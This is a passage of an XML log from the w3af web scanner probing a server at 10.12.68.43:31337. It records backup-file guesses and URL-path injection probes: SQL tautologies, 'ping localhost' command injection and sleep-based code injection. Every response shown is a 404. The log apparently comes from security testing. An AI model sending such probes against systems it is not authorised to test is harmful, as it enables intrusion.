&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="368">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="369">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="370">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="371">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.backup HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="374">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="389">
                <http-request>
                    <status>GET http://10.12.68.43:31337/t8qte%3C%2F-%3Et8qte%2F%2At8qte%22t8qtet8qte%27t8qtet8qte%60t8qtet8qte+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="390">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Wy1xcxUy HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="413">
                <http-request>
                    <status>GET http://10.12.68.43:31337/44%22+OR+%2244%22%3D%2244 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="414">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="416">
                <http-request>
                    <status>GET http://10.12.68.43:31337/sleep%283%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="424">
                <http-request>
                    <status>GET http://10.12.68.43:31337/44%22+AND+%2244%22%3D%2245 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="428">
                <http-request>
                    <status>GET http://10.12.68.43:31337/d%27z%220 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="434">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3C%21-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="454">
                <http-request>
                    <status>GET http://10.12.68.43:31337/44%27+OR+%2744%27%3D%2744 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="468">
                <http-request>
                    <status>GET http://10.12.68.43:31337/44%27+AND+%2744%27%3D%2745 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="483">
                <http-request>
                    <status>GET http://10.12.68.43:31337/44+OR+44%3D44+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="485">
                <http-request>
                    <status>GET http://10.12.68.43:31337/__import__%28%27time%27%29.sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="572" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/__import__%28%27time%27%29.sleep%283%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="487">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="495">
                <http-request>
                    <status>GET http://10.12.68.43:31337/44+AND+44%3D45+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="517">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="518">
                <http-request>
                    <status>GET http://10.12.68.43:31337/iDontExist HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
